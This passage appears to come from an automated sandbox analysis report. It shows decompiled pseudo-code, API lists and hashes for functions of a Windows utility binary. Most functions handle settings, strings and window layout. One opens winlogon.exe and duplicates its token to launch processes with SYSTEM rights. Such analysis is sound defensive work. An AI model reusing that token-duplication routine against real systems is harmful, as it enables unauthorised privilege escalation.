                                                                                      • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                      • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                      • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                      • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 88%
                                                                                      			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                      0x0040639c
                                                                                      0x004063a4
                                                                                      0x004063b2
                                                                                      0x004063c2
                                                                                      0x004063d3
                                                                                      0x004063dc
                                                                                      0x004063eb
                                                                                      0x004063f0
                                                                                      0x00406401
                                                                                      0x00000000
                                                                                      0x0040641e
                                                                                      0x0040641f

                                                                                      APIs
                                                                                        • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                      • wcscpy.MSVCRT ref: 004063B2
                                                                                      • wcscpy.MSVCRT ref: 004063C2
                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                        • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                      • API String ID: 3176057301-2039793938
                                                                                      • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                      • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                      • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                      • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 16%
                                                                                      			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                      0x0040adf6
                                                                                      0x0040adf8
                                                                                      0x0040adfa
                                                                                      0x0040adfb
                                                                                      0x0040adfb
                                                                                      0x0040ae02
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ae04
                                                                                      0x0040ae05
                                                                                      0x0040ae6d
                                                                                      0x0040ae6e
                                                                                      0x0040ae73
                                                                                      0x0040ae76
                                                                                      0x0040ae7f
                                                                                      0x0040ae83
                                                                                      0x0040ae86
                                                                                      0x00000000
                                                                                      0x0040ae86
                                                                                      0x0040ae8f
                                                                                      0x0040ae0c
                                                                                      0x0040ae10
                                                                                      0x0040ae1e
                                                                                      0x0040ae3b
                                                                                      0x0040ae4a
                                                                                      0x0040ae65
                                                                                      0x0040ae7a
                                                                                      0x0040ae7e
                                                                                      0x0040ae67
                                                                                      0x0040ae67
                                                                                      0x0040ae68
                                                                                      0x00000000
                                                                                      0x0040ae68
                                                                                      0x0040ae4c
                                                                                      0x0040ae4c
                                                                                      0x0040ae4e
                                                                                      0x00000000
                                                                                      0x0040ae4e
                                                                                      0x0040ae3d
                                                                                      0x0040ae3d
                                                                                      0x0040ae3f
                                                                                      0x0040ae53
                                                                                      0x0040ae54
                                                                                      0x0040ae59
                                                                                      0x0040ae5c
                                                                                      0x0040ae5c
                                                                                      0x0040ae20
                                                                                      0x0040ae28
                                                                                      0x0040ae2d
                                                                                      0x0040ae30
                                                                                      0x0040ae30
                                                                                      0x0040ae12
                                                                                      0x0040ae12
                                                                                      0x0040ae13
                                                                                      0x00000000
                                                                                      0x0040ae13
                                                                                      0x00000000
                                                                                      0x0040ae10

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                      • API String ID: 3510742995-3273207271
                                                                                      • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                      • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                      • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                      • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                      0x004041f9
                                                                                      0x00404205
                                                                                      0x00404208
                                                                                      0x00404217
                                                                                      0x0040421e
                                                                                      0x00404236
                                                                                      0x0040423f
                                                                                      0x0040424a
                                                                                      0x0040425f
                                                                                      0x0040426b
                                                                                      0x0040426e
                                                                                      0x0040426e
                                                                                      0x00404275
                                                                                      0x004043be
                                                                                      0x004043ce
                                                                                      0x004043d0
                                                                                      0x004043d3
                                                                                      0x004043da
                                                                                      0x004043da
                                                                                      0x004043c0
                                                                                      0x004043c3
                                                                                      0x004043c3
                                                                                      0x0040427b
                                                                                      0x0040428c
                                                                                      0x0040428f
                                                                                      0x00404295
                                                                                      0x004042a5
                                                                                      0x004042b8
                                                                                      0x004042cb
                                                                                      0x004042de
                                                                                      0x004042f1
                                                                                      0x00404304
                                                                                      0x00404317
                                                                                      0x0040432a
                                                                                      0x0040433d
                                                                                      0x00404350
                                                                                      0x00404363
                                                                                      0x00404376
                                                                                      0x00404389
                                                                                      0x0040439c
                                                                                      0x004043a4
                                                                                      0x004043af
                                                                                      0x004043b5
                                                                                      0x004043b5
                                                                                      0x004043f5

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040421E
                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                      • DragFinish.SHELL32(?), ref: 0040423F
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                        • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                        • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                      • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                      • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                      • String ID: $
                                                                                      • API String ID: 2142561256-3993045852
                                                                                      • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                      • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                      • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                      • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 55%
                                                                                      			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                      0x00405b81
                                                                                      0x00405b88
                                                                                      0x00405b8a
                                                                                      0x00405b8a
                                                                                      0x00405b8f
                                                                                      0x00405b96
                                                                                      0x00405b9b
                                                                                      0x00405bad
                                                                                      0x00405bad
                                                                                      0x00405b9d
                                                                                      0x00405b9d
                                                                                      0x00405ba8
                                                                                      0x00405bab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405bab
                                                                                      0x00405be9
                                                                                      0x00405be9
                                                                                      0x00405baf
                                                                                      0x00405bb1
                                                                                      0x00405ce2
                                                                                      0x00405ce2
                                                                                      0x00405bb7
                                                                                      0x00405bbd
                                                                                      0x00405bf6
                                                                                      0x00405c4b
                                                                                      0x00405c4c
                                                                                      0x00405c52
                                                                                      0x00405c53
                                                                                      0x00000000
                                                                                      0x00405bf8
                                                                                      0x00405c02
                                                                                      0x00405c0e
                                                                                      0x00405c13
                                                                                      0x00405c18
                                                                                      0x00405c2c
                                                                                      0x00405c2e
                                                                                      0x00405c3b
                                                                                      0x00405c3c
                                                                                      0x00405c42
                                                                                      0x00000000
                                                                                      0x00405c1a
                                                                                      0x00405c25
                                                                                      0x00405c2a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405c2a
                                                                                      0x00405c18
                                                                                      0x00405bbf
                                                                                      0x00405bc0
                                                                                      0x00405bcd
                                                                                      0x00405bce
                                                                                      0x00405bd7
                                                                                      0x00405c58
                                                                                      0x00405c5f
                                                                                      0x00405c61
                                                                                      0x00405c61
                                                                                      0x00405c63
                                                                                      0x00405cdb
                                                                                      0x00405cdb
                                                                                      0x00405c65
                                                                                      0x00405c65
                                                                                      0x00405c74
                                                                                      0x00000000
                                                                                      0x00405c84
                                                                                      0x00405c8a
                                                                                      0x00405c8d
                                                                                      0x00405c99
                                                                                      0x00405caf
                                                                                      0x00405cbd
                                                                                      0x00405cc8
                                                                                      0x00405cd4
                                                                                      0x00405cd9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405cd9
                                                                                      0x00405c74
                                                                                      0x00405c63
                                                                                      0x00405ce6

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                      • wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                        • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                      • wcslen.MSVCRT ref: 00405C20
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                      • memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                        • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                      • String ID: strings
                                                                                      • API String ID: 3166385802-3030018805
                                                                                      • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                      • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                      • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                      • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 75%
                                                                                      			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                      0x00401e59
                                                                                      0x00401e5c
                                                                                      0x00401e64
                                                                                      0x00401e67
                                                                                      0x00401ef9
                                                                                      0x00401e6d
                                                                                      0x00401e70
                                                                                      0x00401e76
                                                                                      0x00401e79
                                                                                      0x00401e7e
                                                                                      0x00401e83
                                                                                      0x00401e92
                                                                                      0x00401e85
                                                                                      0x00401e8e
                                                                                      0x00401e8e
                                                                                      0x00401e96
                                                                                      0x00401ee6
                                                                                      0x00401e98
                                                                                      0x00401e9b
                                                                                      0x00401e9e
                                                                                      0x00401ea3
                                                                                      0x00401ea8
                                                                                      0x00401ebb
                                                                                      0x00401eaa
                                                                                      0x00401eb7
                                                                                      0x00401eb7
                                                                                      0x00401ebf
                                                                                      0x00401ed3
                                                                                      0x00401ec1
                                                                                      0x00401ec7
                                                                                      0x00401ec9
                                                                                      0x00401ec9
                                                                                      0x00401ed8
                                                                                      0x00401ed8
                                                                                      0x00401eeb
                                                                                      0x00401eeb
                                                                                      0x00401f01

                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                        • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                        • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                      • String ID: winlogon.exe
                                                                                      • API String ID: 1315556178-961692650
                                                                                      • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                      • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                      • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                      • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 79%
                                                                                      			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                      0x00405241
                                                                                      0x00405250
                                                                                      0x00405257
                                                                                      0x0040525f
                                                                                      0x00405262
                                                                                      0x00405265
                                                                                      0x00405268
                                                                                      0x0040526f
                                                                                      0x0040526f
                                                                                      0x00405277
                                                                                      0x00405277
                                                                                      0x0040527a
                                                                                      0x0040527f
                                                                                      0x00405284
                                                                                      0x00405285
                                                                                      0x00405291
                                                                                      0x00405296
                                                                                      0x004052a9
                                                                                      0x004052b3
                                                                                      0x004052b7
                                                                                      0x004052bc
                                                                                      0x004052ca
                                                                                      0x004052d2
                                                                                      0x004052d5
                                                                                      0x004052d8
                                                                                      0x004052d8
                                                                                      0x004052db
                                                                                      0x004052db
                                                                                      0x004052e1
                                                                                      0x004052e4
                                                                                      0x004052e8
                                                                                      0x004052f2

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                      • String ID: %s (%s)
                                                                                      • API String ID: 3979103747-1363028141
                                                                                      • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                      • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                      • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                      • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 78%
                                                                                      			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
